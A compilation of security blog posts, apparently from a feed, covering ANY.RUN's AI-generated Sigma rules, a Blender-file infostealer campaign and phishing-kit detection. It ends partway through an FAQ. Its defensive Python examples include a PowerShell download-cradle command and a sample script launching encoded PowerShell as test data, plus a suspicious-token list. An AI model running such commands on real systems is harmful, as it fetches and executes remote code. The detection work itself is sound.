AI Sigma Rules: Scale Threat Detection, Drive Down MTTR 

Security teams face thousands of alerts every single day. Many of them don’t clearly show whether there’s a true threat behind them. Investigation slows down, analysts lose time on low-value signals, and important findings are often buried in noise. 

AI Sigma Rules change this routine. With this new capability in ANY.RUN’s Interactive Sandbox, SOC teams can not only see the source of malicious activity in the standard Sigma format but also use the generated rules across their entire environment. Every confirmed threat now actively improves how your SOC detects the next one and speeds up response. 

The Challenge: From Alert Overload to Actionable Knowledge 

Most SOCs struggle to turn threats they identify into reusable, scalable detection logic. The obstacles pile up quickly: 

  • Hard to share knowledge: Insights often stay with the analyst who handled the case instead of becoming team-wide detection logic. 
  • Manual rule creation: Turning attack behavior into a working rule takes time, testing, and trial-and-error. 
  • Dependency on a few experts: Only senior engineers usually know how to write or adapt rules for each platform. 
  • Slow improvement cycles: Even when analysts uncover something important, converting it into broader protection takes too long. 

All of this results in the same issue: SOCs fix individual incidents, but the lessons don’t consistently carry over into stronger detection coverage. 

How ANY.RUN Solves It with AI Sigma Rules 

AI Sigma Rules displayed inside ANY.RUN sandbox 

AI Sigma Rules automate one of the slowest and most error-prone parts of detection engineering: turning real attack behavior into usable detection logic.  

Instead of manually translating sandbox findings into rules, teams receive a ready-to-review Sigma rule built directly from the recorded malicious activity. 

Each rule is generated from what actually happened during execution: the same events, processes, and fields analysts already trust during investigation. As a result, the detection logic stays closely tied to real attacker behavior, not assumptions or static indicators. 

With AI Sigma Rules, SOC teams can: 

  • Understand the root cause of detections by seeing the exact events and fields that triggered them. 
  • Work in Sigma, the open, vendor-neutral signature format, so one rule can be converted for each security tool instead of being rewritten per platform. 
  • Deploy rules to SIEM, EDR, and other detection tools. Sigma rules are not loaded verbatim; they are converted to each backend’s query language with standard tooling such as sigma-cli and pySigma. 
  • Accelerate incident response by reducing mean time to resolve (MTTR). 

For security leaders, this changes the value of every investigation. A confirmed detection no longer ends with a closed alert but becomes a chance to strengthen the whole infrastructure. 

How AI Sigma Rules Work 

Let’s take a closer look at how you can quickly get an actionable Sigma rule inside ANY.RUN’s Interactive Sandbox. 

1. Submit a suspicious file or URL 
Run the sample in ANY.RUN’s Interactive Sandbox to observe its behavior in real time. 

Settings for malware analysis session with uploaded sample  

2. Wait for a detection to trigger 
As soon as malicious activity is confirmed, the sandbox highlights the event and prepares the data behind it. 

The process of analyzing malicious sample inside ANY.RUN’s sandbox 

3. Open the AI Sigma Rules panel 
Inside the detection view, you’ll see a generated Sigma rule that reflects the exact logic behind the alert, including key event fields and matching conditions. 

AI Sigma Rules panel with the rules generated by ANY.RUN sandbox 

4. Copy or export the rule for deployment 
Use it as a correlation rule, hunting query, or alert in your SIEM, EDR, or other detection layers. From there, analysts can fine-tune and activate the rule in minutes. Before enabling it, run the rule against a window of known-good telemetry from your own environment: a rule generated from a single sandbox run reflects one execution, and the exclusions it needs for your administrative scripts and software deployment tooling only show up when it is tested against real baseline data. 

AI Sigma Rules ready for exporting 

This creates a short, repeatable path that lets SOCs like yours detect this malicious pattern every time it pops up. 
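To make the review-and-tune step concrete, here is an added example (not ANY.RUN’s generator and not pySigma) that evaluates the detection logic of a Sigma rule against constructed process-creation events. The rule is written by hand in the shape a generated rule takes (the dict mirrors the YAML keys of a Sigma rule) and encodes a generic, widely used pattern, an Office application spawning a PowerShell download cradle. The `filter` exclusion, the host and path names, and the IP address in the events are assumptions made up for the example.

```python
"""Minimal evaluator for Sigma detection logic over constructed
process-creation events (Sysmon Event ID 1 / EDR shape).

Added example, not ANY.RUN's generator and not pySigma. Supports the
field modifiers and the 'a and b' / 'a and not b' condition shapes that
generated rules commonly use; pySigma handles the full grammar.
"""
from __future__ import annotations

from typing import Any

# Hand-written rule in the structure of a Sigma YAML rule.
RULE: dict[str, Any] = {
    "title": "Office Application Spawning PowerShell Download Cradle",
    "status": "experimental",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "ParentImage|endswith": ["\\winword.exe", "\\excel.exe", "\\powerpnt.exe"],
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "iwr "],
        },
        # Tuning an analyst adds before deployment: an assumed internal
        # update share that legitimately runs PowerShell from Excel.
        "filter": {"CommandLine|contains": "\\\\corp-fs01\\updates\\"},
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed events; hostnames, paths and the 198.51.100.23 address are made up.
EVENTS: list[dict[str, str]] = [
    {"id": "evt-1",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.23/a.ps1')"},
    {"id": "evt-2",  # same cradle, but not launched from an Office app
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest https://intranet.example/x"},
    {"id": "evt-3",  # matches selection but is excluded by the tuning filter
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Invoke-WebRequest -Uri \\corp-fs01\updates\patch.ps1"
                    r" -OutFile C:\Temp\patch.ps1"},
    {"id": "evt-4",  # Office child process, but not PowerShell
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c whoami"},
]


def _match_value(field_value: str, modifier: str | None, pattern: str) -> bool:
    """Sigma string matching is case-insensitive; apply the field modifier."""
    v, p = field_value.lower(), pattern.lower()
    if modifier is None:
        return v == p
    if modifier == "contains":
        return p in v
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    raise ValueError(f"unsupported modifier: {modifier}")


def _match_map(event: dict[str, str], mapping: dict[str, Any]) -> bool:
    """Keys of a Sigma map are ANDed; a list of values for one key is ORed."""
    for key, patterns in mapping.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not any(_match_value(value, modifier or None, str(p)) for p in patterns):
            return False
    return True


def evaluate(rule: dict[str, Any], event: dict[str, str]) -> bool:
    """Evaluate 'x', 'x and y' or 'x and not y' conditions against one event."""
    det = rule["detection"]
    for term in det["condition"].strip().split(" and "):
        negate = term.startswith("not ")
        name = term[4:] if negate else term
        if _match_map(event, det[name]) == negate:
            return False
    return True


def run(rule: dict[str, Any] = RULE, events: list[dict[str, str]] = EVENTS) -> list[str]:
    """Return the ids of events the rule fires on."""
    return [e["id"] for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    print(run())  # only evt-1 fires; evt-3 is suppressed by the filter
```

Once the `filter` section reflects your own baseline, the same rule file is what you convert for each backend (for example `sigma convert -t splunk -p sysmon rule.yml` with sigma-cli); the evaluator above is only for reasoning about the logic before that step.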

How AI Sigma Rules Benefit SOC Teams 

AI Sigma Rules change how SOC teams scale what they learn from real attacks. Here’s how that impact shows up in day-to-day operations:  

  • Reduce MTTR: Cut the time from first detection to live rule by giving analysts a ready Sigma rule instead of a blank page. Minimize the investigation and handover time because the logic behind the alert is already clear and reviewable. 
  • Increase detection coverage: Expand protection by turning every important detection into a reusable Sigma rule that can run across your SIEM, EDR, and other tools. Close more gaps, faster, with behavior-based rules tied to real attacks your team has seen. 
  • Boost analyst throughput: Free analysts from low-value rule drafting by auto-generating the first version of each rule. Let them focus on validation, tuning, and decisions rather than copy-paste work. Result: less routine work, fewer errors, higher decision speed. 
  • Strengthen MSSP offerings: Scale one investigation into protection for many tenants by reusing the same Sigma rules. Show customers and auditors clear, transparent logic that proves how your SOC turns incidents into durable detections. 
  • Raise Enterprise SOC maturity: Unify detection language across Tier 1, 2, and 3 with a shared Sigma format. Make it easier to share rules, onboard new analysts, and review what really protects the business, not just what generated tickets. 

Try AI Sigma Rules in Your SOC 

AI Sigma Rules are now part of the ANY.RUN Sandbox Enterprise plan, giving teams a faster way to turn real threats into live detection logic. 

Want to see how much time it can save your analysts?  

Request a demo and walk through the workflow with our experts. 

Conclusion 

With AI Sigma Rules, SOCs no longer lose valuable insights to case notes or fragmented tooling. Every confirmed threat becomes an opportunity to strengthen the entire detection stack. As attackers evolve and environments grow more complex, this ability to turn daily investigations into continuous improvement becomes a real advantage. ANY.RUN brings that capability directly into the analyst workflow, making better detection not just possible, but repeatable. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and make more confident decisions. Used by over 15,000 organizations and 500,000 analysts worldwide, the service combines real-time sandbox analysis with actionable threat intelligence to support daily SOC operations. 

With features like interactive malware execution, automated detections, threat intelligence lookup, and now AI Sigma Rules, ANY.RUN enables teams to move from investigation to prevention with greater speed and clarity. It supports Windows, Linux, and Android environments and integrates seamlessly into modern security stacks. 

The post AI Sigma Rules: Scale Threat Detection, Drive Down MTTR  appeared first on ANY.RUN’s Cybersecurity Blog.

Seeking symmetry during ATT&CK® season: How to harness today’s diverse analyst and tester landscape to paint a security masterpiece

Interpreting the vast cybersecurity vendor landscape through the lens of industry analysts and testing authorities can immensely enhance your cyber-resilience.

Source: WeLiveSecurity

A stealer hiding in Blender 3D models | Kaspersky official blog

News outlets recently reported that a threat actor was spreading an infostealer through free 3D model files for the Blender software. This is troubling enough on its own, but it highlights an even more serious problem: the business threat posed by free open source programs, uncontrolled by corporate infosec teams. And the danger comes not from vulnerabilities in the software, but from its very own standard features.

Why Blender and 3D model marketplaces pose a risk

Blender is a 3D graphics and animation suite used by visualization professionals across various industries. The software is free and open-source, and offers extensive functionality. Among Blender’s capabilities is support for executing Python scripts, which are used to automate tasks and add new features.

The package allows users to import external files from specialized marketplaces like CGTrader or Sketchfab. These platforms host both paid and free 3D models by artists and studios. Any of these model files can carry embedded Python scripts: a .blend file stores text datablocks alongside the scene, and a script saved there travels with the model. 

This creates a concerning scenario: marketplaces where files can be uploaded by any user and may not be scanned for malicious content, combined with software that has an Auto Run Python Scripts feature. It allows files to automatically execute embedded Python scripts immediately upon opening — essentially running arbitrary code on the user’s computer in unattended mode.
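Because the script ships inside the .blend container, a file can be triaged before anyone opens it in Blender. The scanner below is an added example, not Kaspersky’s or Blender’s code. It relies on the documented .blend layout used by Blender releases before 5.0 (a 12-byte header, then file blocks of a 4-byte code, a 32-bit size, an old memory address of pointer size, an SDNA index and a count); text datablocks carry the ID code `TX`, and their lines are written as the DATA blocks that follow. The token list is an assumed, deliberately small heuristic, and the sample files are constructed by the example itself rather than saved by Blender. A hit means “open this with Auto Run off and read the script”, not “this file is malware”.

```python
"""Triage scanner for embedded Python text in .blend files.

Added example, not Kaspersky's or Blender's code. Assumes the classic
(pre-5.0) .blend container: header 'BLENDER' + pointer-size char
('_' = 4, '-' = 8) + endianness char ('v' little, 'V' big) + 3-char
version, then file blocks [code:4][size:int32][old addr:ptr][sdna:int32]
[count:int32][payload] ending with 'ENDB'. Little-endian files are assumed
for the 'TX' ID code. gzip-compressed files are handled; zstd ones are
reported as needing external decompression.
"""
from __future__ import annotations

import gzip
import struct
from typing import Iterator

# Assumed heuristic token list; extend it from your own incident data.
SUSPICIOUS = (
    b"subprocess", b"os.system", b"urllib", b"requests.get", b"powershell",
    b"socket.", b"base64.b64decode", b"exec(", b"eval(", b"ctypes",
)
GZIP_MAGIC = b"\x1f\x8b"
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"
TEXT_ID_CODE = b"TX\x00\x00"


def _decompress(data: bytes) -> bytes:
    if data.startswith(GZIP_MAGIC):
        return gzip.decompress(data)
    if data.startswith(ZSTD_MAGIC):
        raise ValueError("zstd-compressed .blend: decompress with the zstandard package first")
    return data


def iter_blocks(data: bytes) -> Iterator[tuple[bytes, bytes]]:
    """Yield (code, payload) for each file block, stopping at ENDB."""
    if not data.startswith(b"BLENDER"):
        raise ValueError("not a .blend file")
    ptr_size = 8 if data[7:8] == b"-" else 4
    endian = "<" if data[8:9] == b"v" else ">"
    hdr = struct.Struct(f"{endian}4si{ptr_size}sii")
    pos = 12
    while pos + hdr.size <= len(data):
        code, size, _old_addr, _sdna, _count = hdr.unpack_from(data, pos)
        pos += hdr.size
        if code == b"ENDB":
            return
        yield code, data[pos:pos + size]
        pos += size


def scan_blend(data: bytes) -> dict:
    """Count embedded Text datablocks and report suspicious tokens in their lines."""
    data = _decompress(data)
    texts: list[bytes] = []
    buf: bytearray | None = None  # accumulates DATA payloads of the current TX block
    for code, payload in iter_blocks(data):
        if code == TEXT_ID_CODE:
            if buf is not None:
                texts.append(bytes(buf))
            buf = bytearray()
        elif code == b"DATA" and buf is not None:
            buf += payload
        elif buf is not None:  # next ID block: the text's DATA blocks are over
            texts.append(bytes(buf))
            buf = None
    if buf is not None:
        texts.append(bytes(buf))
    hits = sorted({t.decode() for text in texts for t in SUSPICIOUS if t in text})
    return {"text_blocks": len(texts), "suspicious_tokens": hits}


# --- constructed sample files (not written by Blender) for trying the scanner ---
def _block(code: bytes, payload: bytes, ptr_size: int = 8) -> bytes:
    return struct.pack(f"<4si{ptr_size}sii", code, len(payload), b"\0" * ptr_size, 0, 1) + payload


def make_sample_blend(script: bytes) -> bytes:
    """Minimal .blend-shaped file with one Text datablock holding `script`."""
    body = _block(TEXT_ID_CODE, b"\0" * 64)            # stand-in for the Text struct
    for line in script.splitlines(keepends=True):
        body += _block(b"DATA", b"\0" * 32)             # stand-in for the TextLine struct
        body += _block(b"DATA", line + b"\0")           # the line's characters
    return b"BLENDER-v402" + body + _block(b"ENDB", b"")


if __name__ == "__main__":
    bad = make_sample_blend(b"import subprocess, base64\nsubprocess.Popen(['powershell', '-enc', 'QQ=='])\n")
    print(scan_blend(bad))  # 1 text block, tokens ['powershell', 'subprocess']
```

Run it over a download before it reaches the artist’s workstation; any file with a non-empty token list goes to a reviewer with Auto Run disabled. On a real file, the TX payload also carries the datablock name, which is worth printing in a report so the reviewer can find the script in Blender’s Text Editor.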


How the StealC V2 infostealer spread via Blender files

The attackers posted free 3D models with the .blend file name extension on the popular CGTrader platform. These files contained a malicious Python script. If the user had the Auto Run Python Scripts feature enabled, downloading and opening the file in Blender triggered the script. It then established a connection to a remote server and downloaded a malware loader from a Cloudflare Workers domain. 

The loader executed a PowerShell script, which in turn downloaded additional malicious payloads from the attackers’ servers. Ultimately, the victim’s computer was infected with the StealC infostealer, enabling the attackers to:

  • Extract data from over 23 browsers.
  • Harvest information from more than 100 browser extensions and 15 crypto wallet applications.
  • Steal data from Telegram, Discord, Tox, Pidgin, ProtonVPN, OpenVPN, and email clients like Thunderbird.
  • Use a User Account Control (UAC) bypass.

The danger of unmonitored work tools

The problem isn’t Blender itself — threat actors will inevitably try to exploit automation features in any popular software. Most end-users don’t consider the risks of enabling common automation features, nor do they typically dive deep into how these features work or how they could be exploited.

The core issue is that security teams aren’t always familiar with the capabilities of specialized tools used by various departments. They simply don’t account for this vector in their threat models.

How to avoid becoming a victim

If your company uses Blender, the first step is to disable the automatic execution of Python scripts (the Auto Run Python Scripts option under Edit > Preferences > Save & Load). Here’s how to do it according to the official documentation. Two caveats for administrators: the setting lives in each user’s preferences, so for managed installs launch Blender with the --disable-autoexec command-line flag to turn the feature off regardless of the stored preference; and when auto-run is off, Blender still shows an “Auto-Run Disabled” banner with an Allow Execution button on files that contain scripts, so users need to know not to click it for files from marketplaces. 

Figure: How to disable the automatic execution of Python scripts in Blender (Auto Run Python Scripts preference). 

Furthermore, to prevent the sudden spread of threats via work tools, we recommend that corporate security teams:

  • Prohibit the use of tools and extensions that haven’t been approved by the security team.
  • Thoroughly vet permitted software, and assess risks before implementing any new services or platforms.
  • Regularly train employees to recognize the risks associated with installing unknown software and using dangerous features. You can automate security awareness training with the Kaspersky Automated Security Awareness Platform.
  • Enforce the use of secure configurations for all work tools.
  • Protect all company-issued devices with modern security solutions.

Source: Kaspersky official blog

Phishing Kit Attacks 101: Everything SOC Analysts Should Know 

Phishing used to be easy to spot. Now it looks clean, trusted, and almost perfect. Behind it are phishkits: ready-made attack platforms built to steal credentials, bypass MFA, and hijack live sessions in seconds. 

For SOC teams, one click starts the countdown. What looks like a routine alert can already be a live account takeover. 

Here’s how these attacks actually work, and how advanced SOC teams catch them before they spread. 

What Is a Phishing kit? 

A phishing kit, aka phishkit, is a ready-made toolkit that attackers use to launch phishing campaigns fast and at scale. Instead of building fake pages and infrastructure from scratch, they buy or rent a kit and deploy a full attack setup in minutes. 

Most phishkits come with: 

  • Fake login pages for popular services 
  • Reverse proxy scripts to quietly intercept traffic 
  • Built-in MFA bypass 
  • Admin panels for harvesting credentials 
  • Tools to filter out bots and security scanners 

What makes phishkits especially dangerous is how little skill they now require. Even low-experience attackers can run advanced phishing operations using these packaged platforms, with the infrastructure, automation, and data collection already built in. 

Example of a Greatness phishkit attack analyzed in ANY.RUN’s Interactive Sandbox 

Detecting phishkits early comes down to understanding what happens after the click. With an interactive sandbox like ANY.RUN, analysts can safely open suspicious links, interact with phishing pages like a real user, and observe the full execution chain as it unfolds. This makes it possible to expose reverse proxy behavior, MFA capture, and credential theft in real time, often within seconds.

Why Phishkits Are So Dangerous for Businesses 

Phishkits quietly remove the barriers that businesses rely on for protection. By sitting between the employee and the real service, these tools capture logins, MFA codes, and active sessions in real time. The result is immediate, legitimate-looking access to corporate systems. 

Once attackers get inside, the impact spreads fast. A single compromised account can open access to email threads, internal tools, cloud platforms, customer data, and even financial systems. From there, attackers blend in, send messages from trusted inboxes, reset passwords, and move deeper without triggering obvious alarms. 

What makes phishkits especially dangerous is how clean the entry point often looks. There’s no malware dropped right away or a suspicious attachment. Just a normal login that isn’t normal at all. This makes early detection hard and gives attackers valuable time to act before security teams even realize something is wrong. 

For businesses, phishkits often lead to: 

  • Silent data leaks from email, cloud apps, and internal systems 
  • Business disruption caused by locked accounts and broken workflows 
  • Direct financial losses from fraud and unauthorized transactions 
  • Follow-up attacks launched from trusted employee inboxes 
  • Long investigations and recovery efforts that stretch on for weeks 
  • Reputational damage and loss of customer trust 

Key Detection Challenges for SOC Teams 

Challenge | What It Looks Like in Practice | Why It’s a Problem 
Clean phishing emails | Messages pass basic filters and look legitimate | No early warning at the email layer 
Reverse proxy behavior | Users log in through a live proxy | Logs show a “normal” successful login 
Short-lived domains | Phishing domains disappear quickly | Blocklists don’t update in time 
Valid credentials & sessions | Attackers use real usernames, passwords, and MFA | No brute-force or obvious abuse signals 
No malware at first stage | No attachment, no payload, just a web login | File-based detection is bypassed 
Rapid attacker response | Access is used seconds after credentials are stolen | SOC has almost no reaction window 
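The “valid credentials & sessions” and “reverse proxy” rows are the hardest to catch at the email or endpoint layer, but they leave a trace in identity logs: the AiTM proxy relays the victim’s real sign-in and then reuses the captured session cookie from the attacker’s machine, so one session identifier appears from a second IP, usually with a different client, minutes after the MFA-backed login. The detection below is an added example, not ANY.RUN’s code. The log lines are constructed JSON, not any vendor’s audit format; the field names, user names and the 203.0.113.x / 198.51.100.x / 192.0.2.x addresses are assumptions from the documentation ranges.

```python
"""Session-replay detection over constructed identity-provider sign-in logs.

Added example, not ANY.RUN's code. Flags a session identifier that is
reused from a different source IP within a short window of the sign-in
that minted it, which is the footprint of a cookie captured by an
adversary-in-the-middle phishkit. Log shape and values are constructed.
"""
from __future__ import annotations

import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in events (assumed field names, documentation-range IPs).
LOGS = """\
{"ts": "2025-11-20T09:00:00Z", "user": "alice@example.com", "ip": "203.0.113.45", "session_id": "S-7f3a", "client": "Chrome 131 / Windows 11", "mfa": true, "result": "success"}
{"ts": "2025-11-20T09:02:30Z", "user": "alice@example.com", "ip": "198.51.100.77", "session_id": "S-7f3a", "client": "Chrome 120 / Linux", "mfa": false, "result": "success"}
{"ts": "2025-11-20T09:10:00Z", "user": "bob@example.com", "ip": "203.0.113.60", "session_id": "S-1c09", "client": "Edge 131 / Windows 11", "mfa": true, "result": "success"}
{"ts": "2025-11-20T12:00:00Z", "user": "carol@example.com", "ip": "192.0.2.10", "session_id": "S-b2e4", "client": "Safari 18 / macOS", "mfa": true, "result": "success"}
{"ts": "2025-11-20T12:03:00Z", "user": "carol@example.com", "ip": "192.0.2.10", "session_id": "S-b2e4", "client": "Safari 18 / macOS", "mfa": false, "result": "success"}
{"ts": "2025-11-20T15:00:00Z", "user": "alice@example.com", "ip": "203.0.113.45", "session_id": "S-9d21", "client": "Chrome 131 / Windows 11", "mfa": true, "result": "success"}
"""


def parse(lines: str) -> list[dict]:
    """Parse JSON lines into events sorted by timestamp (timezone-aware)."""
    events = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def detect_session_replay(events: list[dict], window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """One alert per session whose id is reused from another IP within `window`.

    The first successful event for a session is treated as the sign-in that
    minted it (where MFA was satisfied); any later use from a different IP
    inside the window is the replay. The same IP continuing to use the
    session (carol) is normal and not flagged.
    """
    by_session: dict[str, list[dict]] = defaultdict(list)
    for e in events:
        if e.get("result") == "success":
            by_session[e["session_id"]].append(e)

    alerts = []
    for sid, evs in by_session.items():
        origin = evs[0]
        for e in evs[1:]:
            if e["ip"] != origin["ip"] and e["ts"] - origin["ts"] <= window:
                alerts.append({
                    "user": origin["user"],
                    "session_id": sid,
                    "origin_ip": origin["ip"],
                    "replay_ip": e["ip"],
                    "gap_seconds": int((e["ts"] - origin["ts"]).total_seconds()),
                    "client_changed": e["client"] != origin["client"],
                    "mfa_on_origin": bool(origin.get("mfa")),
                })
                break  # one alert per session is enough to open a case
    return alerts


if __name__ == "__main__":
    for alert in detect_session_replay(parse(LOGS)):
        print(alert)  # alice's S-7f3a reused from 198.51.100.77 after 150 s
```

Key the real query on whatever session or refresh-token identifier your identity provider writes to its sign-in log, and compare ASN or geolocation as well as the raw IP: corporate VPN and mobile carrier egress changes are the main false positive, while a client string change together with an IP change within minutes of an MFA prompt is the strongest single signal that the cookie, not the user, moved.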

How SOC Teams Can Detect Phishkit Attacks Faster 

Speed matters with phishkits. The sooner a team can see the full phishing chain in action, the sooner it can contain access, block infrastructure, and stop the same kit from hitting more users. A fast investigation comes from combining interactive sandboxing with real-time threat intelligence. 

Step 1: Send suspicious links straight to the sandbox 

Instead of only blocking the URL, run it in an isolated environment to see what actually happens after the click: redirects, proxy behavior, and the final phishing page. 

Suspicious link ready for sandbox analysis 

Step 2: Interact with the page like a real user 

Phishkits stay quiet until someone behaves like a victim. Clicking buttons, entering test credentials, and moving through the flow helps trigger session theft, MFA capture, and hidden scripts. 

Step 3: Watch the full chain unfold in real time 

A live sandbox session shows every redirect, outbound connection, script call, and credential capture attempt, not just the final page. 

Full attack chain with EvilProxy and Tycoon 2FA exposed in 40 seconds inside ANY.RUN sandbox 

Step 4: Pull fresh IOCs as the attack runs 

Domains, IPs, URLs, scripts, and proxy infrastructure can be extracted immediately and pushed into blocking rules and hunting queries. 

Relevant IOCs automatically collected in one tab inside ANY.RUN sandbox 

Step 5: Enrich indicators with TI Lookup 

With ANY.RUN TI Lookup, analysts can instantly check whether the same domains, IPs, scripts, or redirect patterns were seen in past phishing or malware campaigns. This helps confirm phishkit families and link related activities. 

Recent Tycoon 2FA analysis sessions found with the help of TI Lookup 

Using indicators from both the sandbox and TI Lookup, teams can quickly: 

  • Identify related infrastructure across past and current cases 
  • Detect active waves using the same phishkit 
  • Validate whether a campaign is isolated or part of a larger operation 

This workflow turns phishing from a slow, reactive task into a fast, repeatable investigation process, with confirmation in minutes. 

Step 6: Track new infrastructure with Threat Intelligence Feeds 

TI Feeds enriched with fresh data from 15,000 SOCs worldwide 

ANY.RUN’s Threat Intelligence Feeds deliver fresh, actionable indicators of compromise (IOCs) sourced directly from live attack data across 15,000 SOCs, ensuring your security infrastructure stays ahead of emerging threats.  

With only 1% overlap with other sources, your team gains access to previously undiscovered threat intelligence that competitors miss. Every IOC comes enriched with detailed sandbox reports and contextual metadata, providing the forensic depth needed for rapid incident response and threat hunting. Real-time updates deliver a live view of the threat landscape as attacks unfold, enabling proactive defense before threats reach your perimeter.  

Integration is seamless. TI Feeds connects directly to your existing SIEM, TIP, and SOAR platforms via popular standards (STIX/TAXII) or through dedicated API and SDK, minimizing implementation overhead while maximizing threat coverage across your entire security stack. 

Real Phishkit Examples Analyzed inside the ANY.RUN Sandbox 

The following examples come from real attacks and show how different phishkits operate in live environments: 

TyKit: A Multi-Stage Microsoft 365 Phishkit in Action 

TyKit is a multi-stage phishing kit built to steal Microsoft 365 credentials at scale. It spreads through malicious SVG files that silently redirect victims to fake login pages protected by CAPTCHA and anti-bot checks. Once credentials are entered, they’re sent straight to the attackers through a structured C2 API. 

View analysis session with Tykit 

The kit has been active since at least mid-2025 and has targeted organizations across finance, IT, government, telecom, and professional services worldwide. Its strength is simplicity: clean delivery, fast credential theft, and infrastructure that’s easy to rotate. 

TyKit shows how modern phishkits don’t need malware to succeed, just one clean login flow is enough. 

Tycoon 2FA: A Phishkit Built to Bypass MFA 

Tycoon 2FA is a phishing-as-a-service platform designed to steal Microsoft 365 and Gmail accounts even when MFA is enabled. It works as an adversary-in-the-middle (AiTM) kit, using a reverse proxy to capture credentials, MFA codes, and active session cookies in real time. 

View real attack exposed inside ANY.RUN sandbox 

What sets Tycoon 2FA apart is its constant evasion upgrades. Over time, it has added: 

  • Rotating CAPTCHA systems 
  • Browser and sandbox fingerprinting 
  • Multi-layer obfuscation (Base64, XOR, AES) 
  • Fake 404 pages and legitimacy checks 
  • Long redirect chains to hide the true entry point 

Once access is captured, attackers log in using a fully valid session. From a SOC view, it often looks like a normal user login until damage is already unfolding. 

Mamba2FA: A Persistent Corporate Phishkit 

Mamba2FA is a widely used phishkit built to steal corporate credentials, with repeated campaigns observed against organizations in the finance and manufacturing sectors. Like TyKit and Tycoon, it relies on clean phishing flows, fast infrastructure rotation, and live credential capture to move quickly before defenders can react. 

What makes Mamba2FA especially useful as an example is how clearly it shows the value of tracking phishkits as ongoing campaigns, not one-off incidents. If your organization has already encountered a specific kit, the worst mistake is treating it as “closed.” 

Using ANY.RUN’s Threat Intelligence Lookup, analysts can instantly surface: 

  • New sandbox analyses tied to the same phishkit 
  • Fresh phishing domains and URLs 
  • Recently reused infrastructure and scripts 

To find recent Mamba2FA activity, teams can use a simple query like: 

threatName:"mamba" AND domainName:"" 

TI Lookup provides a wealth of threat data on phishing kit attacks 

This immediately reveals both new attacks and network indicators observed during live sandbox analysis. 

Instead of chasing isolated alerts, this approach turns phishkits like Mamba2FA into continuously monitored threats, making it much easier to spot repeat campaigns early and shut them down faster. 

Phishkit Evolution: Hybrid Threats 

Phishkits are no longer operating in isolation. One of the most worrying shifts is the rise of hybrid phishing chains, where multiple kits are combined into a single attack. These blended campaigns mix different infrastructures, redirect logic, and credential-theft methods to make detection and attribution far more difficult. 

In recent enterprise-focused attacks, analysts have observed Tycoon 2FA and Salty working together in the same chain. One kit handles the initial lure and proxying, while the other takes over at later stages for credential capture, session hijacking, or follow-up delivery. For SOC teams, this breaks many traditional assumptions about how a “single” phishing campaign should look. 

Check real-world analysis with Tycoon and Salty 

Hybrid attack with Salty and Tycoon detected inside ANY.RUN sandbox in just 35 seconds 

Hybrid chains create several challenges at once: 

  • Indicators belong to different kits, not just one 
  • Redirect paths change mid-attack 
  • Infrastructure overlaps across separate actor groups 
  • Detection rules based on one kit alone often miss the full picture 

This evolution shows where phishing is heading: modular, flexible attack chains built from multiple commercial kits. For defenders, that means investigations must focus on behavior and execution flow, not just kit names or static indicators. 

Key Takeaways for SOC Readiness in 2026 

Phishkits now shape how real-world phishing attacks are built, delivered, and scaled against organizations. 

  • Phishing is now a real-time intrusion, not just a user mistake. Once a link is clicked, the compromise may already be underway. 
  • MFA alone is no longer enough: Session hijacking turns traditional MFA into a speed bump, not a barrier. 
  • Hybrid phishing chains are becoming common: When multiple kits are combined in one attack, single-family detections fall short. 
  • Behavior matters more than static indicators: Clean emails, short-lived domains, and valid sessions leave very little to flag at first glance. 
  • Speed defines outcome: Minutes often decide whether an incident stays contained or escalates. 
  • Evasion must be assumed by default: CAPTCHA abuse, fingerprinting, layered redirects, and sandbox checks are now standard tactics. 

See It for Yourself 

Phishkits behave very differently from what logs alone can show. A live run-through exposes even the most complex phishing chains, from redirects and proxy logic to live credential theft; in over 90% of cases the detection lands within the first 60 seconds of analysis. That speed alone can cut investigation time dramatically and help teams act before access spreads. 

Explore interactive phishkit analysis with ANY.RUN 

About ANY.RUN 

ANY.RUN supports more than 15,000 organizations worldwide, including leaders in finance, healthcare, telecom, retail, and tech, helping them strengthen security operations and respond to threats with greater confidence.  

Designed for speed and visibility, the solution blends interactive malware analysis with live threat intelligence, giving SOC teams instant insight into attack behavior and the context needed to act faster.  

By integrating ANY.RUN’s Threat Intelligence suite into your existing workflows, you can accelerate investigations, minimize breach impact, and build lasting resilience against evolving threats. 

Frequently Asked Questions (FAQ) 

How is a phishkit different from regular phishing? 

Traditional phishing often just steals usernames and passwords. Phishkits go much further. They can: 
– Intercept live sessions 
– Bypass MFA in real time 
– Rotate domains automatically 
– Filter out bots and security scanners 
This turns phishing into a full attack platform, not just a fake page. 

Can phishkits bypass MFA? 

Yes. Many modern phishkits use adversary-in-the-middle (AiTM) techniques through reverse proxies. They capture credentials, MFA codes, and session cookies at the same time. Attackers then reuse the stolen session to log in without triggering MFA again. 

Do phishkit attacks use malware? 

